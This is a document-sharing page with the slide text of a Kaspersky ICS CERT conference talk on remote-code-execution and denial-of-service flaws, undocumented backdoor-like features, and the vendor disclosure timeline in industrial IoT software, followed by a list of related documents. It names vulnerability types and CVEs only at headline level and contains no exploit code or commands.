pwningthe industrial iot: rces and backdoors are...

Report

Post on 25-Jan-2020

11 Views

Category:

Documents

0 Downloads

Preview:

Click to see full reader

TRANSCRIPT

1

Pwning the Industrial IoT: RCEs and backdoors are around!

Sergey Temnikov, Senior Security Researcher, Critical Infrastructure Defense TeamKaspersky Lab ICS CERTVladimir Dashchenko, Senior Security Researcher, Critical Infrastructure Defense TeamKaspersky Lab ICS CERT

2

3

Penetration testersMalware analysts

Security auditors

Industrial engineers

Security analysts

Security architects

Who are we?

4

What’s the IIoT?

5

What’s the IIoT?Simple words

Fancy concept/solution

Old security problems

IIoT

6

Vulnerabilities

18

50

410

10

10

20

30

40

50

60

RCE DOS Injections File manipulations

Account manipulations

Vulnerabilities

7

Vulnerability research approach

• Custom protocols

• DCOM

• OPC UA

8

Vuln1. XML :(

Custom XML parser allows easy trace

9

Vuln1. XML :(

Custom XML parser allows easy trace

10

Vuln2. OPC UA :(

DOS and possible RCE

11

Vuln3. Custom protocol

Not only ICS. It’s huge

12

Vuln3. Custom protocolReported in Dec 2016 (2 RCE; 11 DOS)Reminded in the end of Dec 2016Sent report again in Jan 20176 months of nothingSilently pushes the driver updateNot installed with MS updatesWaited for CVEs (spoiler: no luck)Notified US ICS CERT about potential threat“Hey! We gonna talk about this at DEFCON” email ->private alert sent->confcall with VP/CTOPublishing public advisory with CVEs assigned (CVE-2017-11496, CVE-2017-11497, CVE-2017-11498)BUT THERE’S MORE

13

Strange thing same vendor

14

Strange thing same vendor

Looks like BEAR

Smells like BEAR

Acts like BEAR

Taste like BEAR

What’s that?

NOT-A-BEAR

15

Strange thing same vendorRemotely enable and disable admin panel (undocumented). Panel available on 127.0.0.1

Remotely change proxy-server for the updates

Got the NTLM hash of user who runs the process

Still under research (got new RCEs; logical RCE?)

16

Conclusion and advice

Share the knowledge

Stand corrected

If you want to do Industry 4.0, IIoT and blah-blah-blah – do it right and secure

3dr party software should be tested properly

17

THANK YOU!

Sergey Temnikov (Sergey.Temnikov2@kaspersky.com)Vladimir Dashchenko (Vladimir.Dashchenko@Kaspersky.com)

top related

rces part1 progs&networks
Documents
cryptosystem backdoors - steve gibson
Documents
bullrun - nsa planting backdoors into cryptography
Education
docs introducción a backdoors en wordpress
Documents
owasp top ten backdoors
Documents
real sap backdoors
Documents
bora rces guidelines rces...bora rces guidelines part 1 bora...
Documents
net framework rootkits: backdoors inside your framework ·...
Documents
ios backdoors attack points surveillance mechanisms
Documents
trojans and backdoors
Education
rces part3 online rces
Documents
centrifugal rces and intergration in
Documents
detection of running backdoors
Internet
cehv6 module 08 trojans and backdoors
Documents
silencing hardware backdoors
Documents
troyanos y backdoors
Documents
resou rces - cdbs.webnode.com
Documents
backdoors to combinatorial optimization: feasibility and
Documents
backdoors in crypto - bu
Documents
backdoors et rootkits_avancees_[slides]
Documents